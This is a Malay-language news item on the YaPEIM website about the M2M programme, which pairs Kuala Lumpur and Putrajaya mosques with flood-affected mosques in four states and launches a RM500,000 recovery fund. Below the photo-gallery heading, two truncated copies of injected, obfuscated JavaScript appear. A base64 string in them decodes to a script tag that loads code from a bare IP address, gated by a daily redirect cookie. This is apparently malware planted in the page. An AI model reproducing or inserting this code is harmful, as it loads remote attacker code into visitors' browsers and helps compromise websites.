YaPEIM » Wujud masjid angkat

Terkini

Wujud masjid angkat

Lebih 300 masjid dan surau Jumaat di empat negeri terjejas banjir akan dibantu menerusi Program Masjid Angkat M2M

PUTRAJAYA: Lebih 300 masjid dan surau Jumaat di empat negeri terjejas banjir akan dibantu sama ada dari segi memulihkan fungsi atau mengimarahkannya menerusi Program Masjid Angkat M2M (Masjid ke Masjid).

Menteri di Jabatan Perdana Dato’ Seri Jamil Khir Baharom berkata, menerusi program itu 180 masjid dan surau Jumaat dari Wilayah Persekutuan Kuala Lumpur dan Putrajaya akan menjadi masjid angkat bagi masjid serta surau di negeri terjejas menerusi konsep pemadanan.

“Ini bermakna setiap masjid dari Wilayah Persekutuan akan dipadankan dengan masjid yang terjejas di Kelantan, Terengganu, Pahang dan Perak supaya bantuan dapat diberikan, sekali gus membolehkannya berfungsi seperti biasa atau lebih baik lagi.

“Melalui pelaksanaan program ini, pelbagai inisiatif boleh dilakukan sama ada membabitkan kewangan, buah fikiran, kepakaran, sukarelawan atau sokongan moral,” katanya pada sidang media selepas pelancaran M2M dan pelancaran Tabung Pemulihan M2M semalam.

Hadir sama Presiden dan Pengerusi Lembaga Pemegang Amanah Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) Dato’ Dr Abd Malek Awang Kechil.

Jamil Khir berkata, inisiatif yang boleh dilaksanakan termasuk sebagai medium untuk mengembleng sumbangan komuniti atau ahli kariah bagi memenuhi keperluan masjid terbabit banjir.

“Berusaha membantu memulihkan fungsi dan melaksanakan penambahbaikan infrastruktur masjid dan membantu menyediakan keperluan pembekalan peralatan tertentu sama ada bagi tujuan ibadat atau pendidikan,”katanya.

Beliau berkata, program ini juga satu daripada langkah Strategi Lautan Biru Kebangsaan (NBOS) kerana membabitkan pelbagai agensi dibawah tanggungjawab beliau.

Menurutnya, YaPEIM dan JAKIM akan bertindak sebagai perancang, penyelaras dan pemantau sekali gus menjadi urus setia program M2M.

Sementara Jabatan Agama Islam Wilayah (JAWI) dan Jabatan Agama Islam Negeri (JAIN) di negeri berkenaan akan bertindak sebagai agensi yang mengenalpasti masjid terbabit dalam konsep pemadanan ini.

“JAIN juga bertindak sebagai pemudahcara bagi pelaksanaan program M2M di negeri dan lokaliti masing-masing, serta penyelaras dan memantau perjalanan program bersama YaPEIM dan JAKIM.

“Yayasan Dakwah Islamiah Malaysia (YADIM) bertindak sebagai agensi membantu menyediakan modul atau panduan pelaksanaan, menggerak dan menyelaras program pembangunan kemanusiaan termasuk pendidikan, kerohanian dan kaunseling,”katanya.

Jamil Khir berkata, Tabung Pemulihan Masjid M2M diwujudkan untuk memberi ruang kepada masyarakat Islam menyumbang bagi melicinkan pelaksanaan program ini, dan sebagai permulaan YaPEIM menyediakan peruntukan awal berjumlah RM500,000 untuk program berkenaan. – Harian Metro

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top